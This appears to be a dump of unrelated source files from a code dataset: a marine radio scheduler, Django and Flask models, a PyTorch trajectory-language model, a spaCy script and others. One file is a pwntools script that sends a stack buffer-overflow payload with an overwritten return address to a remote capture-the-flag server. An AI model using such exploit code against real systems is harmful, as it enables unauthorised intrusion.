text stringlengths 8 6.05M |
|---|
#!/usr/bin/python
"""
m802_DSCsched.py
A script to power up and configure an IC-M802 for a DSC sked. ENSURE YOUR RADIO IS IN DSC WATCH MODE AND THEN TURNED OFF BEFORE YOU RUN THIS SCRIPT.
Created by Mark Pitman of sv Tuuletar and Mike Reynolds of sv Zen Again (vk6hsr@gmail.com)
This script requires the following python libraries to be installed:
* apscheduler (pip install apscheduler)
* python-serial (sudo apt-get install python-serial)
"""
from apscheduler.schedulers.blocking import BlockingScheduler
import serial
import time
import os
# Serial link to the radio's remote-control port (udev alias /dev/icom802).
# IC-M802 NMEA control interface: 4800 baud, 8N1, 10 s blocking read timeout.
ser=serial.Serial(port='/dev/icom802', baudrate=4800, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=10)
# Cron fields (UTC) for the on/off schedule: power the radio on at :00 and
# :30 every hour, and off one minute later — a one-minute DSC watch window.
START_HOURS = '0-23'
STOP_HOURS = '0-23'
START_MINS = '0,30'
STOP_MINS = '1,31'
def do_checksum(payload):
    """Return the two-hex-digit NMEA checksum of *payload*.

    The NMEA 0183 checksum is the XOR of every byte between the leading
    '$' and the trailing '*', formatted as two lowercase hex digits.

    Accepts either str or bytes: the original ``bytearray().extend(str)``
    worked only on Python 2 and raises TypeError on Python 3.
    """
    if isinstance(payload, str):
        payload = payload.encode('ascii')
    cs = 0
    for b in bytearray(payload):
        cs = cs ^ b
    return format(cs, '02x')
def do_sentence(payload):
    """Frame *payload* as '$<payload>*<CHECKSUM>', send it to the radio
    and return the one-line response.

    Relies on the module-level serial port ``ser`` being open.
    NOTE(review): ``ser.write`` is given a str, which only works on
    Python 2 / pyserial 2.x — Python 3 requires bytes. Confirm the
    target interpreter before porting.
    """
    checksum = do_checksum(payload)
    # NMEA framing: leading '$', trailing '*' plus uppercase hex checksum.
    command = "$" + payload + "*" + checksum.upper()
    print("# Command: " + command)
    ser.write(command + "\r\n")
    # Blocking read of the radio's reply (up to the 10 s port timeout).
    response = ser.readline()
    print("# Response: " + response[:-2])  # strip trailing CR/LF for display
    return response
def start_radio():
    """Power up the IC-M802 by (re)opening the serial port and sending
    the STARTUP sentence.

    Fix: the original ``print "Starting ICOM-M802"`` statement was
    Python 2-only syntax (a SyntaxError on Python 3) while the rest of
    this file uses ``print()`` calls; made consistent.
    """
    print("Starting ICOM-M802")
    # Re-open the port so a preceding stop_radio() (which closes it)
    # does not leave us writing to a closed handle.
    ser.close(); ser.open()
    do_sentence("STARTUP")
def stop_radio():
    """Close the serial connection; scheduled one minute after each
    start_radio() so the DSC listening window lasts about 60 seconds."""
    print("Closing connection to ICOM-M802")
    ser.close()
if __name__ == "__main__":
sched = BlockingScheduler()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
# Schedules job_function to be run for 1 minute on the hour and half-hour
sched.add_job(start_radio, 'cron', hour=START_HOURS, minute=START_MINS, timezone='utc')
sched.add_job(stop_radio, 'cron', hour=STOP_HOURS, minute=STOP_MINS, timezone='utc')
print('The following schedule is currently defined:')
print(' - Radio turning ON at HOURS: %s MINS: %s'%(START_HOURS, START_MINS))
print(' - Radio turning OFF at HOURS: %s MINS: %s'%(STOP_HOURS, STOP_MINS))
try:
print('Starting schedule NOW')
sched.start()
except (KeyboardInterrupt, SystemExit):
pass |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
class User(models.Model):
    """An account holder.

    Django's implicit auto-increment ``id`` field serves as the primary
    key; ``acct_name`` is the login-style account name.
    """
    acct_name = models.CharField(max_length=24)
    first_name = models.CharField(max_length=24)
    last_name = models.CharField(max_length=24)

    def __str__(self):
        """Render as 'acct_name: First Last'."""
        return '{0}: {1} {2}'.format(self.acct_name, self.first_name, self.last_name)
class Permission(models.Model):
    """A single named capability, granted to users through roles."""
    permission_name = models.CharField(max_length=80)

    def __str__(self):
        """Render as the bare permission name."""
        return self.permission_name
class Role(models.Model):
    """Groups a set of users with the permissions they share."""
    role_name = models.CharField(max_length=80)
    users = models.ManyToManyField(User)
    permissions = models.ManyToManyField(Permission)

    def __str__(self):
        """Render as the bare role name."""
        return self.role_name
|
from data_multiview import Data, PadBatch
import pickle
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torch.optim as optim
import numpy as np
from sklearn.metrics import confusion_matrix
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.utils.tensorboard import SummaryWriter
from scipy.stats import spearmanr
VOCAB_SIZE = 264
def lstm_helper(sequences, lengths, lstm):
    """Run a padded batch through *lstm* and return (outputs, last hidden
    state), with rows restored to the caller's original order.

    sequences: (batch, max_len, feat) padded batch.
    lengths:   per-row true lengths; rows of length 0 are allowed and
               come back as all-zero outputs.
    lstm:      an nn.LSTM constructed with batch_first=True.
    """
    if len(sequences) == 1:
        # Single-row batch: skip packing entirely.
        # NOTE(review): this path feeds the *padded* row to the LSTM, so any
        # trailing pad steps are processed too — confirm callers pass
        # length == max_len here.
        output, (hidden, _) = lstm(sequences)
        return output, hidden[-1]
    # Sort rows by length, descending, as pack_padded_sequence requires.
    ordered_len, ordered_idx = lengths.sort(0, descending=True)
    ordered_sequences = sequences[ordered_idx]
    # remove zero lengths: index of the first all-padding row, if any.
    try:
        nonzero = list(ordered_len).index(0)
    except ValueError:
        nonzero = len(ordered_len)
    sequences_packed = pack_padded_sequence(
        ordered_sequences[:nonzero], ordered_len[:nonzero],
        batch_first=True)
    output_nonzero, (hidden_nonzero, _) = lstm(sequences_packed)
    output_nonzero = pad_packed_sequence(output_nonzero, batch_first=True)[0]
    max_len = sequences.shape[1]
    # pad_packed_sequence pads only to the longest non-empty row.
    max_len_true = output_nonzero.shape[1]
    # Scatter results back so zero-length rows stay all-zero.
    output = torch.zeros(len(sequences), max_len, output_nonzero.shape[-1])
    output_final = torch.zeros(len(sequences), max_len, output_nonzero.shape[-1])
    output[:nonzero, :max_len_true, :] = output_nonzero
    hidden = torch.zeros(len(sequences), hidden_nonzero.shape[-1])
    hidden_final = torch.zeros(len(sequences), hidden_nonzero.shape[-1])
    # hidden_nonzero is (num_layers, batch, size); keep the top layer only.
    hidden[:nonzero, :] = hidden_nonzero[-1]
    # Undo the length sort: row i corresponds to input row i again.
    output_final[ordered_idx] = output
    hidden_final[ordered_idx] = hidden
    return output_final.cuda(), hidden_final.cuda()
class ImgEnc(nn.Module):
def __init__(self, args):
super().__init__()
self.args = args
self.encoder = nn.Sequential(
# nn.BatchNorm2d(3),
nn.Conv2d(3, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Flatten(),
nn.Linear(4*4*args.n_channels, args.img_enc_size),
# nn.Dropout(),
nn.Linear(args.img_enc_size, args.img_enc_size),
)
def forward(self, x):
return self.encoder(x)
class Model(nn.Module):
    """Scores a (trajectory, language description) pair.

    Three per-view ImgEnc encoders (right/left/center) embed each frame;
    the concatenated per-frame features run through an LSTM, the token
    ids through an embedding + LSTM, and the two final states are
    concatenated and scored by a two-layer MLP.

    Fix: removed a large dead block of commented-out code in __init__
    that duplicated the ImgEnc definition.
    """

    def __init__(self, args):
        super().__init__()
        self.args = args
        # One image encoder per camera view.
        self.img_enc_right = ImgEnc(args)
        self.img_enc_left = ImgEnc(args)
        self.img_enc_center = ImgEnc(args)
        # Trajectory encoder over the concatenated 3-view frame features.
        self.traj_encoder = nn.LSTM(3 * args.img_enc_size, args.img_enc_size, batch_first=True, num_layers=args.num_layers)
        # Language encoder.
        self.embedding = nn.Embedding(VOCAB_SIZE, args.lang_enc_size)
        self.descr_encoder = nn.LSTM(args.lang_enc_size, args.lang_enc_size, batch_first=True, num_layers=args.num_layers)
        # Scoring head.
        self.linear1 = nn.Linear(args.img_enc_size + args.lang_enc_size, args.classifier_size)
        self.linear2 = nn.Linear(args.classifier_size, 1)

    def forward(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len):
        """Score a batch of trajectory/description pairs.

        Returns:
            pred: (batch, 1) unbounded score.
            lang_emb: token embeddings of *lang*.
        """
        # Fold (batch, time) into one axis for the per-frame CNN, then
        # restore (batch, time, feat).
        traj_right_enc = self.img_enc_right(traj_right.view(-1, *traj_right.shape[-3:]))
        traj_right_enc = traj_right_enc.view(*traj_right.shape[:2], -1)
        traj_left_enc = self.img_enc_left(traj_left.view(-1, *traj_left.shape[-3:]))
        traj_left_enc = traj_left_enc.view(*traj_left.shape[:2], -1)
        traj_center_enc = self.img_enc_center(traj_center.view(-1, *traj_center.shape[-3:]))
        traj_center_enc = traj_center_enc.view(*traj_center.shape[:2], -1)
        # Concatenate the three views per frame.
        traj_enc = torch.cat([traj_right_enc, traj_left_enc, traj_center_enc], dim=-1)
        _, traj_enc = lstm_helper(traj_enc, traj_len, self.traj_encoder)
        lang_emb = self.embedding(lang)
        _, lang_enc = lstm_helper(lang_emb, lang_len, self.descr_encoder)
        traj_lang = torch.cat([traj_enc, lang_enc], dim=-1)
        pred = F.relu(self.linear1(traj_lang))
        pred = self.linear2(pred)
        return pred, lang_emb
class Predict:
    """Loads a trained Model checkpoint for scoring trajectories against
    language descriptions, with optional online adaptation (update())."""

    def __init__(self, model_file, lr, n_updates):
        """model_file: checkpoint written by Train.train_model (holds
        'args' and 'state_dict'); lr / n_updates configure update()."""
        ckpt = torch.load(model_file)
        self.args = ckpt['args']
        self.model = Model(self.args).cuda()
        self.model.load_state_dict(ckpt['state_dict'])
        self.model.eval()
        # Optimizer used only by the online-adaptation update() loop.
        self.optimizer = optim.Adam(
            self.model.parameters(),
            lr=lr,
            weight_decay=0.)
        self.n_updates = n_updates

    def predict_scores(self, traj, lang, traj_len, lang_len):
        """Score every contiguous sub-trajectory traj[start:end].

        NOTE(review): this calls self.model with a single trajectory plus
        language, while Model.forward in this file takes three camera
        views, and it softmaxes/indexes a value that forward defines as a
        (pred, lang_emb) tuple. This method looks stale relative to the
        multiview Model — confirm before use.
        """
        self.model.eval()
        scores = np.zeros((len(traj), len(traj)))
        for start in range(len(traj)):
            for end in range(start+1, len(traj)):
                traj_sampled = traj[start:end, :, :, :]
                traj_sampled = np.array(traj_sampled)
                traj_sampled = torch.from_numpy(traj_sampled)
                traj_sampled = traj_sampled.cuda().float()
                # (T, H, W, C) -> (T, C, H, W); assumes channels-last input — confirm.
                traj_sampled = torch.transpose(traj_sampled, 2, 3)
                traj_sampled = torch.transpose(traj_sampled, 1, 2)
                lang = lang.cuda().long()
                traj_len = torch.Tensor([end-start])
                lang_len = torch.Tensor(lang_len)
                prob = self.model(torch.unsqueeze(traj_sampled, 0), torch.unsqueeze(lang, 0), traj_len, lang_len)
                prob_norm = torch.softmax(prob, dim=-1).data.cpu().numpy()
                # Score = P(match) - P(no match).
                scores[start, end] = (prob_norm[0, 1] - prob_norm[0, 0])
        return scores

    def predict_test(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len):
        """Batched scoring pass over already-collated test data.

        NOTE(review): calls self.model.train() rather than eval(), so any
        dropout/batch-norm layers (currently commented out in ImgEnc)
        would run in training mode — confirm this is intentional.
        """
        self.model.train()
        traj_right_sampled = traj_right
        traj_right_sampled = np.array(traj_right_sampled)
        traj_right_sampled = torch.from_numpy(traj_right_sampled)
        traj_right_sampled = traj_right_sampled.cuda().float()
        # Batched input: (B, T, H, W, C) -> (B, T, C, H, W).
        traj_right_sampled = torch.transpose(traj_right_sampled, 3, 4)
        traj_right_sampled = torch.transpose(traj_right_sampled, 2, 3)
        traj_left_sampled = traj_left
        traj_left_sampled = np.array(traj_left_sampled)
        traj_left_sampled = torch.from_numpy(traj_left_sampled)
        traj_left_sampled = traj_left_sampled.cuda().float()
        traj_left_sampled = torch.transpose(traj_left_sampled, 3, 4)
        traj_left_sampled = torch.transpose(traj_left_sampled, 2, 3)
        traj_center_sampled = traj_center
        traj_center_sampled = np.array(traj_center_sampled)
        traj_center_sampled = torch.from_numpy(traj_center_sampled)
        traj_center_sampled = traj_center_sampled.cuda().float()
        traj_center_sampled = torch.transpose(traj_center_sampled, 3, 4)
        traj_center_sampled = torch.transpose(traj_center_sampled, 2, 3)
        lang = lang.cuda().long()
        traj_len = torch.Tensor(traj_len)
        lang_len = torch.Tensor(lang_len)
        prob, lang_emb = self.model(traj_right_sampled, traj_left_sampled, traj_center_sampled, lang, traj_len, lang_len)
        return prob, lang_emb

    def predict(self, traj_right, traj_left, traj_center, lang):
        """Score one trajectory (per-view frame lists) against *lang*.

        Frames are subsampled to every 10th, anchored so the final frame
        is always kept (the [::-1][::10][::-1] trick), and pixel values
        are scaled from [0, 255] to [0, 1] before the forward pass.
        """
        self.model.eval()
        with torch.no_grad():
            # Keep every 10th frame, counted backwards from the last one.
            traj_right_sampled = traj_right[::-1][::10][::-1]
            traj_right_sampled = np.array(traj_right_sampled)
            traj_right_sampled = torch.from_numpy(traj_right_sampled)
            traj_right_sampled = traj_right_sampled.cuda().float()
            # (T, H, W, C) -> (T, C, H, W).
            traj_right_sampled = torch.transpose(traj_right_sampled, 2, 3)
            traj_right_sampled = torch.transpose(traj_right_sampled, 1, 2)
            traj_left_sampled = traj_left[::-1][::10][::-1]
            traj_left_sampled = np.array(traj_left_sampled)
            traj_left_sampled = torch.from_numpy(traj_left_sampled)
            traj_left_sampled = traj_left_sampled.cuda().float()
            traj_left_sampled = torch.transpose(traj_left_sampled, 2, 3)
            traj_left_sampled = torch.transpose(traj_left_sampled, 1, 2)
            traj_center_sampled = traj_center[::-1][::10][::-1]
            traj_center_sampled = np.array(traj_center_sampled)
            traj_center_sampled = torch.from_numpy(traj_center_sampled)
            traj_center_sampled = traj_center_sampled.cuda().float()
            traj_center_sampled = torch.transpose(traj_center_sampled, 2, 3)
            traj_center_sampled = torch.transpose(traj_center_sampled, 1, 2)
            lang = lang.cuda().long()
            traj_len = torch.Tensor([len(traj_right_sampled)])
            lang_len = torch.Tensor([len(lang)])
            prob = self.model(torch.unsqueeze(traj_right_sampled, 0) / 255., torch.unsqueeze(traj_left_sampled, 0) / 255., \
                torch.unsqueeze(traj_center_sampled, 0) / 255., torch.unsqueeze(lang, 0), traj_len, lang_len)
        return prob

    def update(self, traj_r, traj_l, traj_c, lang, label):
        """Online adaptation: run n_updates gradient steps pushing the
        score toward +1 (label truthy) or -1 (label falsy), each on a
        random ~10% subset of the first 150 frames."""
        self.model.train()
        traj_len = min(150, len(traj_r))
        traj_r = torch.from_numpy(np.array(traj_r[:traj_len]))
        traj_r = torch.transpose(traj_r, 2, 3)
        traj_r = torch.transpose(traj_r, 1, 2)
        traj_l = torch.from_numpy(np.array(traj_l[:traj_len]))
        traj_l = torch.transpose(traj_l, 2, 3)
        traj_l = torch.transpose(traj_l, 1, 2)
        traj_c = torch.from_numpy(np.array(traj_c[:traj_len]))
        traj_c = torch.transpose(traj_c, 2, 3)
        traj_c = torch.transpose(traj_c, 1, 2)
        lang = lang.cuda().long()
        lang_len = torch.Tensor([len(lang)])
        # Map a {0,1} label to a {-1,+1} regression target.
        label = torch.Tensor([2*label - 1]).cuda()
        for _ in range(self.n_updates):
            # Resample until at least one frame is selected (~10% keep rate).
            while True:
                selected = np.random.random(traj_len) > 0.9
                if np.sum(selected) > 0:
                    break
            traj_r_ = traj_r[selected].cuda().float()
            traj_l_ = traj_l[selected].cuda().float()
            traj_c_ = traj_c[selected].cuda().float()
            traj_len_ = torch.Tensor([len(traj_r_)])
            self.optimizer.zero_grad()
            # NOTE(review): Model.forward in this file returns a
            # (pred, lang_emb) tuple, which [:, 0] cannot index — confirm
            # which Model variant this class is used with.
            prob = self.model(
                torch.unsqueeze(traj_r_, 0) / 255.,
                torch.unsqueeze(traj_l_, 0) / 255.,
                torch.unsqueeze(traj_c_, 0) / 255.,
                torch.unsqueeze(lang, 0),
                traj_len_, lang_len)[:, 0]
            loss = torch.nn.MSELoss()(prob, label)
            loss.backward()
            self.optimizer.step()
class Train:
    """Training harness for Model: three separate Adam optimizers (image
    encoders / language encoder / remaining head parameters) with
    optional tensorboard histogram logging."""

    def __init__(self, args, train_data_loader, valid_data_loader):
        self.args = args
        self.model = Model(args).cuda()
        self.train_data_loader = train_data_loader
        self.valid_data_loader = valid_data_loader
        # Parameter groups: the three ImgEnc views; the language embedding
        # plus its LSTM; everything else (trajectory LSTM and linears),
        # selected by excluding the other groups' name prefixes.
        params_img_enc = list(self.model.img_enc_right.parameters()) + list(self.model.img_enc_left.parameters()) + list(self.model.img_enc_center.parameters())
        params_lang_enc = list(self.model.embedding.parameters()) + list(self.model.descr_encoder.parameters())
        params_rest = list(filter(lambda kv: 'img_enc' not in kv[0] and 'embedding' not in kv[0] and 'descr_enc' not in kv[0], self.model.named_parameters()))
        params_rest = list(map(lambda x: x[1], params_rest))
        self.optimizer_img_enc = optim.Adam(
            params_img_enc,
            lr=self.args.lr_img_enc,
            weight_decay=self.args.weight_decay)
        self.optimizer_lang_enc = optim.Adam(
            params_lang_enc,
            lr=self.args.lr_lang_enc,
            weight_decay=self.args.weight_decay)
        self.optimizer_rest = optim.Adam(
            params_rest,
            lr=self.args.lr_rest,
            weight_decay=self.args.weight_decay)
        # tensorboard (enabled only when --logdir is given)
        if args.logdir:
            self.writer = SummaryWriter(log_dir=args.logdir)
        self.global_step = 0

    def run_batch(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len, labels, weights, is_train):
        """One forward (and, when is_train, backward) pass.

        Returns (per-sample predictions squashed to [-1, 1], scalar loss).
        NOTE(review): Model.forward in this file returns a (pred, lang_emb)
        tuple, which torch.tanh cannot accept — this trainer presumably
        targets a single-output Model variant; confirm.
        """
        if is_train:
            self.model.train()
            self.optimizer_img_enc.zero_grad()
            self.optimizer_lang_enc.zero_grad()
            self.optimizer_rest.zero_grad()
        else:
            self.model.eval()
        traj_right = traj_right.cuda().float()
        traj_left = traj_left.cuda().float()
        traj_center = traj_center.cuda().float()
        lang = lang.cuda().long()
        labels = torch.Tensor(labels).cuda().long()
        weights = weights.cuda().float()
        # Regression of a tanh-squashed score onto weights*labels.
        prob = torch.tanh(self.model(traj_right, traj_left, traj_center, lang, traj_len, lang_len))[:, 0]
        loss = torch.nn.MSELoss()(prob, weights*labels)
        '''
        loss = torch.nn.CrossEntropyLoss(reduction='none')(prob, labels)
        loss = torch.mean(weights * loss)
        pred = torch.argmax(prob, dim=-1)
        pred = torch.sign(prob)
        '''
        pred = prob
        if is_train:
            loss.backward()
            self.optimizer_img_enc.step()
            self.optimizer_lang_enc.step()
            self.optimizer_rest.step()
            # tensorboard: parameter/gradient histograms every 100 steps.
            if self.args.logdir:
                self.global_step += 1
                if self.global_step % 100 == 0:
                    for tag, value in self.model.named_parameters():
                        tag = tag.replace('.', '/')
                        self.writer.add_histogram(tag, value.data.cpu().numpy(), self.global_step)
                        self.writer.add_histogram(tag+'/grad', value.grad.data.cpu().numpy(), self.global_step)
        return pred, loss.item()

    def run_epoch(self, data_loader, is_train):
        """Run one pass over *data_loader*.

        Returns (mean loss rounded to 2 dp, Spearman rho between
        predictions and weighted labels, None placeholder for the
        confusion matrix slot).
        """
        pred_all = []
        labels_all = []
        loss_all = []
        for frames_right, frames_left, frames_center, descr, descr_enc, traj_len, descr_len, labels, _, _, weights in data_loader:
            pred, loss = self.run_batch(frames_right, frames_left, frames_center, descr_enc, traj_len, descr_len, labels, weights, is_train)
            pred_all += pred.tolist()
            labels_all += (weights * labels).tolist()
            loss_all.append(loss)
        # Rank correlation stands in for accuracy on this regression target.
        t, p = spearmanr(pred_all, labels_all)
        return np.round(np.mean(loss_all), 2), t, None

    def train_model(self):
        """Alternate validation and training epochs, checkpointing to
        args.save_path whenever validation correlation improves.

        NOTE(review): with max_epochs == 0 (the CLI default) the
        `epoch == max_epochs` check never matches and training runs
        until externally stopped — confirm that is intended.
        """
        best_val_acc = 0.
        epoch = 1
        while True:
            valid_loss, valid_acc, valid_cm = self.run_epoch(self.valid_data_loader, is_train=False)
            train_loss, train_acc, train_cm = self.run_epoch(self.train_data_loader, is_train=True)
            # TA/VA columns are Spearman rho scaled to percent.
            print('Epoch: {}\tTL: {:.2f}\tTA: {:.2f}\tVL: {:.2f}\tVA: {:.2f}'.format(
                epoch, train_loss, 100. * train_acc, valid_loss, 100. * valid_acc))
            if valid_acc > best_val_acc:
                best_val_acc = valid_acc
                if self.args.save_path:
                    state = {
                        'args': self.args,
                        'epoch': epoch,
                        'best_val_acc': best_val_acc,
                        'state_dict': self.model.state_dict(),
                    }
                    torch.save(state, self.args.save_path)
            if epoch == self.args.max_epochs:
                break
            epoch += 1
def main(args):
    """Entry point: build the train/valid datasets and loaders, then train."""
    datasets = {
        mode: Data(mode=mode, sampling=args.sampling, prefix=args.prefix)
        for mode in ('train', 'valid')
    }
    print(len(datasets['train']))
    print(len(datasets['valid']))

    def _make_loader(dataset):
        # Both splits use the identical loader configuration.
        return DataLoader(
            dataset=dataset,
            batch_size=args.batch_size,
            shuffle=True,
            collate_fn=PadBatch(),
            num_workers=16)

    Train(args, _make_loader(datasets['train']),
          _make_loader(datasets['valid'])).train_model()
def get_args():
    """Parse command-line hyper-parameters and paths (defaults unchanged)."""
    import argparse
    parser = argparse.ArgumentParser()
    # Integer-valued options.
    for flag, default in (
            ('batch-size', 16),
            ('n-channels', 64),
            ('img-enc-size', 128),
            ('lang-enc-size', 128),
            ('classifier-size', 512),
            ('num-layers', 2),
            ('max-epochs', 0)):
        parser.add_argument('--' + flag, type=int, default=default)
    # Float-valued options (learning rates and weight decay).
    for flag, default in (
            ('lr', 1e-4),
            ('lr-img-enc', 1e-4),
            ('lr-lang-enc', 1e-4),
            ('lr-rest', 1e-4),
            ('weight-decay', 0.)):
        parser.add_argument('--' + flag, type=float, default=default)
    parser.add_argument('--save-path', default=None)
    parser.add_argument('--logdir', default=None)
    parser.add_argument('--sampling', default='random')
    parser.add_argument('--prefix', action='store_true')
    return parser.parse_args()
if __name__ == '__main__':
    # CLI entry point: parse hyper-parameters, then train.
    args = get_args()
    main(args)
|
# Generated by Django 2.2.1 on 2019-07-12 14:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the blog app: Tags, Posts and Comments."""

    initial = True

    dependencies = [
        # Posts and Comments reference the configured user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Tags',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=20, unique=True)),
                ('slug', models.SlugField(max_length=20, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Posts',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50, unique=True)),
                ('slug', models.SlugField(max_length=100, unique=True)),
                ('body', models.TextField(max_length=255)),
                ('create_date', models.DateTimeField(default=django.utils.timezone.now)),
                # NOTE(review): field name 'autor' (sic) presumably mirrors
                # the model definition; fixing the spelling would need a
                # follow-up migration, never an edit of this applied one.
                ('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('tags', models.ManyToManyField(blank=True, related_name='posts', to='blog.Tags')),
            ],
            options={
                # Newest posts first.
                'ordering': ['-create_date'],
            },
        ),
        migrations.CreateModel(
            name='Comments',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('create_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('comment', models.TextField(max_length=255)),
                # When the author is deleted, comments fall back to user id 1.
                ('author', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, to=settings.AUTH_USER_MODEL)),
                ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Posts')),
            ],
            options={
                'ordering': ['-create_date'],
            },
        ),
    ]
|
import uuid
from app.main import db, flask_bcrypt
class Alumni(db.Model):
    """Alumni account, linked one-to-one to an Odoo contact record."""
    __tablename__ = "alumni"

    alumni_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Public identifier handed out instead of the numeric PK.
    alumni_uuid = db.Column(db.String(50), unique=True)
    # Id of the matching contact in the Odoo CRM; required.
    odoo_contact_id = db.Column(db.String(50), unique=True, nullable=False)
    email = db.Column(db.String(100), unique=True)
    # bcrypt hash of the password — never the plaintext.
    password = db.Column(db.String(100))
    # Becomes True once the user confirms the account (starts False).
    user_confirmed = db.Column(db.Boolean())
    # Whether contact details may be shown to other alumni.
    allow_show_contacts = db.Column(db.Boolean())
    update_form = db.relationship("UpdateForm", back_populates="alumni")

    def __init__(self, odoo_contact_id, email, password, allow_show_contacts):
        """Create an unconfirmed account; *password* is hashed immediately."""
        self.alumni_uuid = str(uuid.uuid4())
        self.odoo_contact_id = odoo_contact_id
        self.email = email
        self.password = flask_bcrypt.generate_password_hash(password).decode()
        self.user_confirmed = False
        self.allow_show_contacts = allow_show_contacts

    def check_password(self, password):
        """Return True if *password* matches the stored bcrypt hash."""
        return flask_bcrypt.check_password_hash(self.password, password)
|
from cookiecutter.main import cookiecutter
import os
import psutil
import pkg_resources
def process(args):
    """Render the selected cookiecutter template into the current directory."""
    # Create project from the cookiecutter-pypackage/ template.
    cwd = os.getcwd()
    cache_dir = os.path.join(cwd, 'cache')
    publish_dir = os.path.join(cwd, 'publish')
    extra_context = {
        'publish_host': os.uname()[1],
        'docker_host_cache_dir': cache_dir,
        'docker_host_publish_dir': publish_dir,
        'cache_dir': cache_dir,
        'publish_dir': publish_dir,
        'twice_no_of_cores': psutil.cpu_count() * 2,
    }
    # '-docker' template variant when running inside a container.
    if args.container:
        template = args.source + '-docker'
    else:
        template = args.source
    data_root = pkg_resources.resource_filename('ronto', 'data/')
    cookiecutter(os.path.join(data_root, template),
                 extra_context=extra_context)
def add_command(subparser):
    """Register the 'bootstrap' sub-command on the given argparse
    subparsers object and wire it to process()."""
    parser = subparser.add_parser(
        "bootstrap",
        help="""
        Create a new Yocto build project from scratch. You will
        be asked a couple of questions and end up with a ronto.yml
        file and an optional site.conf file
        """,
    )
    parser.add_argument('-s', '--source', choices=[ 'repo', 'git', 'ignore' ],
        default='git',
        help="""
        Select how build configuration sources are maintained:
        repo - via google repo tool
        git - by a set of git repositories
        ignore - ronto does not take care for sources
        Default is git
        """)
    parser.add_argument('-c', '--container', action='store_true',
        help="Run in docker container")
    # Dispatch to process() when this sub-command is selected.
    parser.set_defaults(func=process)
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
def main():
    """Exploit for the remote 'magic' binary: overflow the stack buffer
    and overwrite the return address with 0x8048613."""
    elf = ELF('./magic')
    # libc = ELF('')
    proc = remote('bamboofox.cs.nctu.edu.tw', 10000)
    # proc = elf.process()
    # log.debug('You may attach this process to gdb now.')
    # raw_input()
    proc.recvuntil(': ')
    proc.sendline(b'aaaa')
    proc.recvuntil(': ')
    # Do not use elf.sym['never_use'], the resulting bytes
    # contain a '\x0d' which will cut all subsequent bytes off...
    # 4 NUL bytes + 68 filler bytes reach the saved return address.
    payload = 4 * b'\x00' + 68 * b'A'  # padding
    payload += p32(0x8048613)  # ret
    proc.sendline(payload)
    proc.interactive()


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
# @Author: Sean
# @Date: 2016-03-29 21:44:28
# @Last Modified by: Seanli310
# @Last Modified time: 2016-04-12 22:46:33
from spacy.en import English, LOCAL_DATA_DIR
import spacy.en
import os
import preprocessing
import sys
def dependency_labels_to_root(token):
    """Walk up the syntactic tree, collecting the arc labels.

    Returns the ``dep`` label of each node from *token* up to (but not
    including) the root, nearest-first. The root is recognized by being
    its own head.
    """
    collected = []
    current = token
    while current.head is not current:
        collected.append(current.dep)
        current = current.head
    return collected
# --- Script body (Python 2: note the print statement below) ---

# Read the sample document, lowercased line by line. `doc` is built but
# not used further below.
f = open('../../data/set1/a1.txt','r')
doc = []
for line in f.readlines():
    line = line.strip().lower()
    doc.append(line);

# Load the spaCy English pipeline. data_dir honors a SPACY_DATA override
# (assigned but not passed to English() — presumably picked up elsewhere;
# confirm).
data_dir = os.environ.get('SPACY_DATA', LOCAL_DATA_DIR)
nlp = English(parser=True, tagger=True, entity=True)

# Parse the document named on the command line, dropping non-ASCII bytes.
d = preprocessing.docToString(sys.argv[1])
d = d.decode('ascii','ignore')
doc4 = nlp(d);
for sen in doc4.sents:
    t = []
    for token in sen:
        # One '[token_POS_TAG]' cell per token.
        t.append('['+str(token)+'_'+str(token.pos_)+'_'+str(token.tag_)+']')
        tmp = dependency_labels_to_root(token)
    print " ".join(t) #token, token.tag_,token.head #token.prob, token.cluster, token.head, token.ent_iob, tmp, 'token.pos:', token.pos_, 'token.lemma:', token.lemma_,
    #for i in tmp:
    #    print nlp.vocab.strings[int(i)]

# nlp is the package
# vocab is a Dict of vocabulary inside the nlp
# .prob is used to get the probability of a word.
nlp.vocab[u'quietly'].prob

# ID and String: strings maps between string and integer id.
hello_id = nlp.vocab.strings['Hello']
hello_str = nlp.vocab.strings[hello_id]
|
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
